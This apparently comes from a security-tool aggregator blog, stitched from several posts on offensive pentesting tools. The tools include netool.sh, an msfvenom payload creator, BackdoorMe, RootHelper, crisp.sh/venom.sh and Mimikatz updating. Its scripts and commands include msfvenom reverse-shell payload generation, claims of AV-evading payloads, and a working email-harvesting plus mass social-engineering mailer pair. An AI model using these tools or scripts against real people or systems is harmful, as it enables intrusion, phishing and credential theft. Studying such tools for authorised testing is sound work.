
burp_cert() {
	# Burp serves its CA certificate on the proxy listener; -s checks that the download was not empty.
	wget 'http://127.0.0.1:8080/cert' -o /dev/null -O "$scriptpath/cacert.der"
	if [ -s "$scriptpath/cacert.der" ]; then
		echo -e "[*] Burp Suite certificate has been downloaded, and can be found at [$scriptpath/cacert.der]."
	else
		echo "[!]Error: Firefox Security Toolkit was not able to download the Burp Suite certificate; you need to do this manually."
	fi
}
	
##Checking whether Firefox is installed.
if ! [ -f /usr/bin/firefox ]; then
echo -e "[*]Firefox does not seem to be installed.\n[*]Quitting..."
exit
fi


echo -en "[#]Click [Enter] to start. "; read -r

##Creating a tmp directory.
scriptpath=$(mktemp -d)
echo -e "[*]Created a tmp directory at [$scriptpath]."

##Inserting the "Installation is Finished page" into $scriptpath
echo '<!DOCTYPE HTML><html><head><title>Firefox Security Toolkit</title></head><body style="text-align:center"><h1>Installation is Finished</h1><h2>You can close Firefox.</h2><h3><i>Firefox Security Toolkit</i></h3></body></html>' > "$scriptpath/.installation_finished.html"


##Ask about whether the user would like to download Burpsuite Certificate.
echo -n "[@]Would you like to download Burp Suite Certificate? [y/n]. Note that Burp Suite should be running in your machine. "; read -r burp_cert_answer
	if [[ $burp_cert_answer == 'y' ]];then
		burp_cert
	fi
	
####Downloading packages.
echo -e "[*]Downloading Addons."

#Copy as Plain Text
wget "https://addons.mozilla.org/firefox/downloads/latest/copy-as-plain-text/addon-344925-latest.xpi" -o /dev/null -O "$scriptpath/copy_as_plain_text.xpi"

#Web Developer
wget "https://addons.mozilla.org/firefox/downloads/latest/web-developer/addon-60-latest.xpi" -o /dev/null -O "$scriptpath/web_developer.xpi"

#Tamper Data
wget "https://addons.mozilla.org/firefox/downloads/latest/tamper-data/addon-966-latest.xpi" -o /dev/null -O "$scriptpath/tamper_data.xpi"

#User Agent Switcher
wget "https://addons.mozilla.org/firefox/downloads/latest/user-agent-switcher/addon-59-latest.xpi" -o /dev/null -O "$scriptpath/user_agent_switcher.xpi"

#Right-Click XSS
wget "https://addons.mozilla.org/firefox/downloads/file/215802/rightclickxss-0.2.1-fx.xpi" -o /dev/null -O "$scriptpath/right_click_xss.xpi"

#Foxy Proxy
wget "https://addons.mozilla.org/firefox/downloads/file/319162/foxyproxy_standard-4.5.5-sm+tb+fx.xpi" -o /dev/null -O "$scriptpath/foxy_proxy.xpi"

#HackBar
wget "https://addons.mozilla.org/firefox/downloads/latest/3899/addon-3899-latest.xpi" -o /dev/null -O "$scriptpath/hackbar.xpi"

#Wappalyzer
wget "https://addons.mozilla.org/firefox/downloads/latest/wappalyzer/addon-10229-latest.xpi" -o /dev/null -O "$scriptpath/wappalyzer.xpi"

#PassiveRecon
wget "https://addons.mozilla.org/firefox/downloads/latest/6196/addon-6196-latest.xpi" -o /dev/null -O "$scriptpath/passiverecon.xpi"

#Cookie Manager+
wget "https://addons.mozilla.org/firefox/downloads/latest/92079/addon-92079-latest.xpi" -o /dev/null -O "$scriptpath/cookiemanager+.xpi"

#Cookie Export/Import
wget "https://addons.mozilla.org/firefox/downloads/latest/344927/addon-344927-latest.xpi" -o /dev/null -O "$scriptpath/cookie_export_import.xpi"

#FlagFox
wget "https://addons.mozilla.org/firefox/downloads/latest/5791/addon-5791-latest.xpi" -o /dev/null -O "$scriptpath/flagfox.xpi"

#Fireforce
wget "https://addons.mozilla.org/firefox/downloads/file/204186/fireforce-2.2-fx.xpi" -o /dev/null -O "$scriptpath/fireforce.xpi"

#CSRF-Finder
wget "https://addons.mozilla.org/firefox/downloads/file/224182/csrf_finder-1.2-fx.xpi" -o /dev/null -O "$scriptpath/csrf_finder.xpi"

#Multi Fox
wget "https://addons.mozilla.org/firefox/downloads/latest/200283/addon-200283-latest.xpi" -o /dev/null -O "$scriptpath/multifox.xpi"

#FireBug
wget "https://addons.mozilla.org/firefox/downloads/latest/1843/addon-1843-latest.xpi" -o /dev/null -O "$scriptpath/firebug.xpi"

#Live HTTP Headers
wget "https://addons.mozilla.org/firefox/downloads/file/345004/live_http_headers_fixed_by_danyialshahid-0.17.1-signed-sm+fx.xpi" -o /dev/null -O "$scriptpath/live_http_headers.xpi"

#Crypto Fox
wget "https://addons.mozilla.org/firefox/downloads/file/140447/cryptofox-2.2-fx.xpi" -o /dev/null  -O "$scriptpath/crypto_fox.xpi" 

###Ask about whether to download user-agent list for User-Agent Switcher addon
echo -n "[@]Would you like to download user-agent list for User-Agent Switcher Addon? [y/n]"; read -r useragent_list_answer
if [[ $useragent_list_answer == 'y' ]];then
	wget 'http://techpatterns.com/downloads/firefox/useragentswitcher.xml' -o /dev/null -O "$scriptpath/useragentswitcher.xml"
	echo -e "[*]Additional User-Agents have been downloaded for the User-Agent Switcher Addon; you can import them manually. The list can be found at: [$scriptpath/useragentswitcher.xml]."
fi


####Messages.
echo -e "[*]Downloading addons has been finished.\n";
echo -en "[**]Click [Enter] to run Firefox to finish the task. "; read -r
echo -e "[*]Running Firefox to install the addons.\n"
##Installing The Addons. The process needs to be semi-manually due to Mozilla Firefox security policies.
#Stopping Firefox if it's running.
killall firefox &> /dev/null
#Running it again.
/usr/bin/firefox "$scriptpath/"*.xpi "$scriptpath/.installation_finished.html" &> /dev/null
####

##In case you need to delete the tmp directory, uncomment the following line.
#rm -rf "$scriptpath"; echo -e "[*]Deleted the tmp directory."
echo -e "[**]Firefox Security Toolkit is finished\n"
echo -e "Have a nice day! - Mazin Ahmed"
########################################################################

Source : https://github.com/mazen160

netool.sh version 4.6 codename ‘Single_byte_XOR’ released : MitM PENTESTING OPENSOURCE T00LKIT.


Changelog v-4.6:
This release was codenamed ‘Single_byte_XOR’ because it focuses on obfuscating payloads, with the inclusion of the Shellter PE injector and different msf encoders with different iterations to evade AV detection (Windows binaries). The tool also ships with the new automated exploit ‘web_delivery’, which executes the 2nd stage in RAM without touching disk.
We now have 5 modules that try to evade AV detection (Windows):
2 – Backdooring EXE Files -> bdf_backdoor module
4 – Meterpreter (ReL1K) -> powershell payload
5 – Web_delivery (PSH/PYTHON) -> powershell or python
27 – Generate shellcode -> c-to-exe -> veil-evasion
29 – Shellter PE infector -> inject shellcode into windows binaries
☆ ☆ ☆ ☆ ☆
[ Upgraded ]
msfcli replaced by msfconsole

[ Bugs Fixed ]
+ ettercap IPv6 bug -> incorrect target selection
+ host-a-file -> phishing webpages displays under MitM
[ New Modules ]
+ MitM ROUTER phishing -> capture router credentials
+ unicorn.py -> HTA drive-by URL payload execution
+ java.jar phishing -> Drive-by URL payload execution
+ adobe_flash_hacking_team_uaf -> exploit + mitm + dns_spoof
+ web_delivery msf module -> python or powershell payloads
+ Shellter PE injector (by kyREcon) binaries windows obfuscator

[ Improved ]
+ netool toolkit Gnu Public License (GPL) display
+ build shortcut to toolkit -> gnome-desktop-item-edit
+ file-selection GUI to ettercap -> zenity displays added
+ host-a-file attack -> zenity file-selection GUI added
+ windows payloads encoding (different msf encoders/iterations)

Operating Systems Supported:
+ Linux-Ubuntu | Linux-kali | Parrot security OS | BackBox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

netool- version 4.6 codename Single_byte_XOR

Netool is a toolkit written in ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. The toolkit makes easy tasks such as sniffing TCP/UDP traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, DoS attacks in WAN/LAN networks and TCP/UDP packet manipulation using etter-filters; it also gives you the ability to capture pictures of the target's web browsing (driftnet) and uses macchanger to change the MAC address as a decoy for scans.

Rootsector: this module allows you to automate some attacks over DNS_SPOOF + MitM (phishing – social engineering) using the metasploit, apache2 and ettercap frameworks, such as the generation of payloads, shellcode and backdoors delivered via dns_spoof and the MitM method to redirect a target to your phishing webpage.

Recently the “inurlbr” web scanner (by cleiton) was introduced, which allows us to search for SQL-related bugs using several search engines; this framework can also be used in conjunction with other frameworks like nmap (using the flag --comand-vul).

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Note for version 4.6: you must install manually using the source download:
tar xf *.tar.gz
cd your folder
./INSTALL.sh
Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operating Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | BackBox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Download : Ubuntu: opensource.tar.gz (26.9 MB)  | Kali-Linux: opensource[kali].tar.gz(26.9 MB)
Source : http://sourceforge.net/projects/netoolsh/
Our Post Before : http://seclist.us/netool-sh-v-4-5-2-released-mitm-pentesting-opensource-t00lkit.html

Msfvenom Payload Creator (MPC) v-1.4 released.


Changelog v1.4: Add OSX support, bind shell fix, add DLL format
+ Improved OSX support (Thanks @yugoslavskiy)
+ Fix bind shell issue (Thanks @nullmode)
+ Added .dll support (Thanks @nullmode)
+ Removed some colour from the help page
+ Tweaked the output formatting a little

quick way to generate various “basic” Meterpreter payloads via msfvenom (part of the Metasploit framework).

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on the user's choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and being able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
+ Can’t remember your IP for an interface? Don’t sweat it, just use the interface name: eth0.
+ Don’t know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your selection? Either way, it’s not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Download : v1.4.zip  | v1.4.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/updates-msfvenom-payload-creator-mpc-v-1-3-2.html

SHURIKEN – Exploit throwing framework.


A simple bash-based throwing framework. It’s stupid simple, and configuration is done with flat files.
+ Adding an exploit
Each exploit belongs in its own directory under exploits. Symlinks work nicely if moving the files isn’t ideal.
Each exploit directory must contain a file named exploit. If this file is executable (chmod +x), it is invoked each round. It is not invoked with any arguments.
The arguments to the exploit are passed in the environment. The most important ones are:

TARGET_HOST - IP or hostname to exploit
TEAM_NAME - Pretty name of the team being exploited
FLAG_HOST - IP to send flags to
FLAG_PORT - Port to send flags to
FLAG_FILE - File to write flags to (instead of IP:port)

All data from each invocation of the exploit is logged into the logs directory inside the exploit directory. It is automatically created if it does not exist.

+ Blacklists and Whitelists
By default, an exploit is thrown against all teams every round.
To modify this behavior, create a file named whitelist or blacklist in your exploit directory. Any IPs or team names in blacklist are skipped. If whitelist exists, any IPs or teams not contained in the file are skipped.

+ Logging
Exploitation Attempt Logs
All of the exploitation attempts are logged to stdout, as well as syslog.
See config/log for an extensible location to add to the logging.
To set up the syslog endpoint:

cat >> /etc/syslog.conf <<EOF
# Shuriken logs
local3.* /var/log/shuriken
EOF
touch /var/log/shuriken

Per-Exploit Logs
Each exploit attempt gets its own log directory, in the logs directory. Each log directory is timestamped, and includes the team name and target IP. For example, it might look something like: exploits/example_slowpoke/logs/2015-07-01-02:37:58-samurai-104.236.67.106-94230.
Inside of the log directory are a handful of files:

stdout - All data written over stdout
stderr - All data written over stderr
status - How the exploit exited (normally, terminated, etc)
run - Shell script used to invoke the exploit

To see the full list of environment variables, look at the run file generated for each execution.

+ Configuration
Shuriken does not require any command line arguments; all configuration comes from the files in the config/ directory. By default, no configuration should be necessary.
In addition to those documented above, there are also:

before - Function which is invoked before every exploit
after - Function which is invoked after every exploit
log - Function used by Shuriken to do its logging
get_log_dir - Emits the location where the current exploit should log to

Listeners
Some example key listeners are included in listeners/. These are designed as testing tools in lieu of a full-blown Nodachi key listener.
– tcp receives flags via TCP
– fifo receives flags from a FIFO

Installation:

git clone https://github.com/samuraictf/shuriken-framework
cd shuriken-framework
./listeners/tcp &
./shuriken > /dev/null

Source : https://github.com/samuraictf

Odysseus – Design of Hardware Trojan.


Disclaimer: this post is for education & research purposes only.

Odysseus – Design of Hardware Trojan
Verilog files modified: (Located at verilog/)
1.Added Trojan.v (implementation of T1)
2.Changed id_stage.v to add the Trojan

Random instruction generator:
A Python script is located at testgenerator/random_test_gen.py, along with 100 randomly generated testcases.

Random test generator script

Type ‘make’ before running the following scripts:
Scripts for testing:
1.test.sh: Test all EECS470 testcases
Uncomment the code for calling $display in id_stage.v before running 2 and 3.

Test all EECS470 testcases

2.test_random.sh: Test all the randomly generated testcases.
3.test_prob.sh: Test the probability that T1 and T2 are triggered.
4.test_swactivity.sh: Test how many cycles out of total cycles are the two signals (specified in id_stage.v) equal to each other.

Type ‘make syn’ to synthesize the whole processor
fib.s in the current directory is the modified testcase that can trigger the Trojan and cause an infinite loop.

How to use?

git clone https://github.com/xmguo/EECS573_FA15_Project_Design_of_Hardware_Trojan <your clone folder name>
cd into <your clone folder name>

Source : https://github.com/xmguo

roothelper – A Bash script that will aid with privilege escalation on a Linux system.


Roothelper will aid in the process of privilege escalation on a Linux system that has been compromised, by fetching a number of enumeration and exploit suggestion scripts. The latest version downloads four scripts: two enumeration shell scripts and two exploit suggesters, one written in Perl and the other in Python.

roothelper – A Bash script that will aid with privilege escalation on a Linux system.

Priv-Esc scripts:
+ LinEnum : Shellscript that enumerates the system configuration.
+ unix-privesc-check : Shellscript that enumerates the system configuration and runs some privilege escalation checks as well.
+ linuxprivchecker : A python implementation to suggest exploits particular to the system that’s been compromised.
+ Linux_Exploit_Suggester : A perl script that does the same as the one mentioned above.

Usage:

git clone https://github.com/NullArray/RootHelper
cd RootHelper
chmod +x roothelper.sh
./roothelper.sh

roothelper.sh script:

#!/bin/bash

function usage()
{ printf "%b \a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
and exploit suggestion scripts. Below is a quick overview of the available options.
The 'Help' option displays this informational message.
The 'Download' option fetches the relevant files and places them in the /tmp/ directory.
The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively; please
note that if the 'mkdir' command is unavailable, the operation will not succeed and the 'Download' option should be used instead.
The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n "
}

# Directory the scripts are downloaded to. The original assigned "/tmp/" to PATH,
# which hid wget, unzip and find from the shell and made 'Clean up' delete all of /tmp.
DLDIR="/tmp"

# Fetch the two enumeration scripts and the two exploit suggesters.
function download()
{
    wget -O "$DLDIR/ExploitSuggest.py" http://www.securitysift.com/download/linuxprivchecker.py
    wget -O "$DLDIR/LinEnum.zip" https://github.com/rebootuser/LinEnum/archive/master.zip
    wget -O "$DLDIR/ExploitSuggest_perl.zip" https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip
    wget -O "$DLDIR/file3.zip" https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip   # unix-privesc-check
}

# Download and unzip
function dzip()
{
    echo "Downloading and extracting scripts..."
    download
    cd "$DLDIR" || { echo "Could not enter $DLDIR"; return 1; }
    for zip in *.zip
    do
        [ -e "$zip" ] || continue
        dirname="${zip%.zip}"
        if mkdir "$dirname"
        then
            if cd "$dirname"
            then
                unzip "../$zip"
                cd ..
                rm -f "$zip"
            else
                echo "Could not unpack $zip - cd failed"
            fi
        else
            echo "Could not unpack $zip - mkdir failed"
        fi
    done
    cd - > /dev/null
}

usage

printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"

PS3='Please enter your choice: '
options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
select opt in "${options[@]}"
do
    case $opt in
        "Help")
            usage
            printf "%b \n"
            ;;
        "Download")
            echo "Downloading scripts to $DLDIR/"
            download
            printf "%b \n"
            ;;
        "Download and unzip")
            dzip
            printf "%b \n"
            ;;
        "Clean up")
            echo "Removing downloaded files"
            # Remove only what this script fetched, never the whole directory.
            rm -rf "$DLDIR/ExploitSuggest.py" "$DLDIR/LinEnum.zip" "$DLDIR/LinEnum" \
                   "$DLDIR/ExploitSuggest_perl.zip" "$DLDIR/ExploitSuggest_perl" \
                   "$DLDIR/file3.zip" "$DLDIR/file3"
            printf "%b \n"
            ;;
        "Quit")
            break
            ;;
        *) echo invalid option;;
    esac
done

Source : https://github.com/NullArray/RootHelper

Updates BackdoorMe – a powerful auto-backdooring utility.


Latest Change 23/12/2015:
+ fixed travis version.
+ added poison module.
+ Fixed Bash and added a second bash backdoor.
+ removed offending tests.

Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.

BackdoorMe, a powerful auto-backdooring utility. This tool has been tested on Kali Linux 2.0 and Ubuntu 14.04

Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python: please run the dependencies python script to install the necessary dependencies. Backdoorme requires python2.7 or higher.

Installation:

git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name>
cd <your Folder>
python dependencies.py
python master.py


Update:
cd backdoorme
git pull

Source: https://github.com/Kkevsterrr | Our post Before


Eharvester is simple script which extracts email address from the given domain for penetration testing process.


Eharvester is a simple script which extracts email addresses from a given domain for the penetration testing process.
The script works in two modes:
+ In the first mode you have to specify the sitemap of the website; it is fast. Just visit http://www.xml-sitemaps.com/ and make a sitemap of the target website, download the text file urllist.txt and put it in the same directory as the script. The script then crawls the URLs from urllist.txt one by one and collects email addresses.
+ The second mode is automatic: just supply the domain name and it makes the sitemap and then gathers email addresses. But it is slow.

email-sender

With the help of esender you can send social engineering emails to all addresses gathered by eharvester.

Usage of script :

git clone https://github.com/MacAwesome/ehs-supermaster
chmod +x harvester.sh
chmod +x esender.sh
./harvester.sh
./esender.sh

esender.sh script:

#!/usr/bin/env bash 

echo "
 _____                              _           
| ____|          ___  ___ _ __   __| | ___ _ __ 
|  _|    _____  / __|/ _ \  _ \ / _  |/ _ \  __|
| |___  |_____| \__ \  __/ | | | (_| |  __/ |   
|_____|         |___/\___|_| |_|\__,_|\___|_|   
                                                
"

echo "
Enter your email Address"
read -r address
echo "
Enter your password"
read -r -s password
echo "
Enter Subject"
read -r subject
echo "
Enter message. If you want to send an HTML message, enter HTML code starting with <html>"
read -r msg

echo "Messages are sending"
# Send the message to every address that harvester.sh collected into output.txt.
# The list is read on fd 3 so that sendEmail cannot consume it from stdin; the
# original put an echo between 'while read' and 'do', which made the loop
# condition always true, and removed a non-existent file inside the loop.
while read -r f1 <&3
do
    [ -n "$f1" ] || continue
    sendEmail -f "$address" -t "$f1" -u "$subject" -m "$msg" -s smtp.gmail.com:587 -xu "$address" -xp "$password"
done 3< output.txt

harvester.sh script:

#!/usr/bin/env bash 

#E-Harvester is a simple script to harvest email addresses for penetration testing.
#The script works in two modes.
#In the first mode you have to create the sitemap manually. You can use (http://www.xml-sitemaps.com/) to create the sitemap,
#then put the sitemap text file in the working directory of E-HARVESTER and name it urllist.txt.
#The second mode is automatic: just specify the domain name and it will first crawl the website, then harvest email addresses; it is slow due to the crawling process.

# Render every URL in urllist.txt as plain text and collect anything that looks
# like an email address into output.txt.
harvest() {
    tmpfile=$(mktemp)
    # The URL list is read on fd 3 so that w3m cannot consume the loop's input.
    while read -r url <&3
    do
        [ -n "$url" ] || continue
        # -dump prints the rendered page to stdout instead of opening w3m interactively.
        w3m -dump "$url" < /dev/null > "$tmpfile"
        perl -wne'while(/[\w\.]+@[\w\.]+/g){print "$&\n"}' "$tmpfile" >> output.txt
    done 3< urllist.txt
    rm -f "$tmpfile"
    # Drop duplicates collected across pages.
    sort -u output.txt -o output.txt
}

echo "
 _____           _   _    _    ______     _______ ____ _____ _____ ____  
| ____|         | | | |  / \  |  _ \ \   / / ____/ ___|_   _| ____|  _ \ 
|  _|    _____  | |_| | / _ \ | |_) \ \ / /|  _| \___ \ | | |  _| | |_) |
| |___  |_____| |  _  |/ ___ \|  _ < \ V / | |___ ___) || | | |___|  _ < 
|_____|         |_| |_/_/   \_\_| \_\ \_/  |_____|____/ |_| |_____|_| \_\\
                                                                         
"
echo "Please choose method"

echo "
1. If you have a sitemap of the website, name it urllist.txt and put it in the same directory (works fast)
2. Generate the sitemap, then harvest email addresses (automatic but slow)
"
read -r m1
if [ "$m1" = "1" ];then
echo "
Script is working, please be patient and give it some time to harvest.
"
harvest

cat output.txt
echo "
Harvesting is complete. Open the output.txt file to view the email addresses.
"
fi

if [ "$m1" = "2" ];then
echo "
Please enter the website to harvest email addresses from
For example http://tipstrickshack.blogspot.com
"
read -r choice
echo "
Now we have to make the urllist of the website, so be patient and give it some time to harvest.
"
wget --spider --recursive --no-verbose --output-file=wgetlog.txt "$choice"
sed -n "s@.\+ URL:\([^ ]\+\) .\+@\1@p" wgetlog.txt | sed "s@&@\&amp;@" > urllist.txt
rm wgetlog.txt
harvest

cat output.txt
echo "
Harvesting is complete. Open the output.txt file to view the email addresses.
"
echo "
Use E-sender to send email to the harvested email addresses
"
fi

Source: https://github.com/MacAwesome

Msfvenom Payload Creator (MPC) v-1.4.1.


Changelog v1.4.1 : Supports non-root users & non english OSs.

MPC-v1-4-1
quick way to generate various “basic” Meterpreter payloads via msfvenom (part of the Metasploit framework).

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on the user's choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and being able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
+ Can’t remember your IP for an interface? Don’t sweat it, just use the interface name: eth0.
+ Don’t know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your selection? Either way, it’s not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Installation using git:

git clone https://github.com/g0tmi1k/mpc && cd mpc
./mpc.sh

update
cd mpc 
git pull

Download : v1.4.1.zip  | v1.4.1.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/msfvenom-payload-creator-mpc-v-1-4-released.html

crisp.sh v1.0.7 – msfvenom shellcode generator/compiler/listener.


[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punishable by law.

The script uses msfvenom (metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), injects the generated shellcode into one function (example: python, where “the python function will execute the shellcode in RAM”), uses compilers such as gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file, and also starts a multi-handler to receive the remote connection (reverse shell or meterpreter session).

The ‘shellcode generator’ tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, powersploit, etc. “P.S. some payloads are undetectable by AV solutions, yes!!!” One of the reasons for that is the use of a function to execute the 2nd stage of shell/meterpreter directly in the target's RAM.

CRISP.SH 1.0.7 – metasploit Shellcode generator/compiler/listener (this script has been tested on Kali 2.0, Ubuntu 14.04, Arch Linux, FreeBSD, Redhat, Centos, Fedora and Mac OSX)

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features:
option – build – target – format – output

1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP

V – msfvenom exercises console
F – FAQ (frequently asked questions)
R – exit shellcode generator

Usage:

download crisp-shellcode-generator.zip
unzip it
cd (your unzip folder)
./crisp.sh

[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE? ]
The default way to generate a Windows binary payload (.exe) using msfvenom is through the -f flag (output format):
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allows us to build shellcode in different formats,
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the following command: sudo msfvenom --help-formats

Now let's generate a simple shellcode for windows/shell/reverse_tcp,
choosing powershell as the output format. Note that we will not use
the -o flag (save the payload), so the generated shellcode
is only displayed in the current terminal window.
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

Download : crisp-shellcode-generator.zip | crisp-shellcode-generator-shell
Source : http://sourceforge.net/p/crisp-shellcode-generator/

venom.sh v1.0.8 stable released – msfvenom shellcode generator/compiler/listener.


[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punishable by law.

Latest change v1.0.8:
+ Biprodeep python execution example
+ 0entropy powershell
+ output folder fix
+ misspelling fixes

The script uses msfvenom (Metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), injects the generated shellcode into one function (example: python; “the python function will execute the shellcode in RAM”) and uses compilers such as gcc (gnu cross compiler), mingw32 or pyinstaller to build the executable file; it also starts a multi-handler to receive the remote connection (reverse shell or meterpreter session).

The ‘shellcode generator’ tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, PowerSploit, etc. “P.S. some payloads are undetectable by AV solutions, yes!!!” One of the reasons for that is the use of a function to execute the 2nd stage of shell/meterpreter directly in the target's RAM.

venom.sh v1.0.8

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features:
option – build – target – format – output

1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP

V – msfvenom exercises console
F – FAQ (frequently asked questions)
R – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

Updates:
cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE? ]
The default way to generate a Windows binary payload (.exe) with msfvenom is through the -f flag (output format):
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allows us to build shellcode in different formats,
such as: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be obtained with the following command: sudo msfvenom --help-formats

Now let's generate a simple shellcode for windows/shell/reverse_tcp,
choosing powershell as the output format. Note that we will not use
the -o (save the payload) option, so the generated shellcode
is only displayed in the current terminal window.
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

Download : see our previous post.
Source : http://sourceforge.net/p/crisp-shellcode-generator/

Bash script for update Mimikatz and to take the powerkatz.dll files.


Bash script that takes the powerkatz.dll files, encodes them using base64 and then replaces the old binaries with the new ones in the Invoke-Mimikatz.ps1 PowerShell file.

update-mimikatz

Usage:
./Update_Mimikatz.sh [arg]
– ps1 > Invoke-Mimikatz.ps1
– x64 > powerkatz_x64.dll
– x32 > powerkatz_x32.dll

Download:

git clone https://github.com/Graph-X/Update_Mimikatz && cd Update_Mimikatz
chmod +x Update_Mimikatz.sh
./Update_Mimikatz.sh

Update_Mimikatz Script:

#!/bin/bash
#
# Update Mimikatz
# Created 1-12-16 by @GraphX
# Last Updated: 1-21-2016
# Description:
#	The script will take your 32 bit and 64 bit 
#	Powerkatz dll files, encode them to b64 and
#	update the Invoke-Mimikatz.ps1 file
###################################################
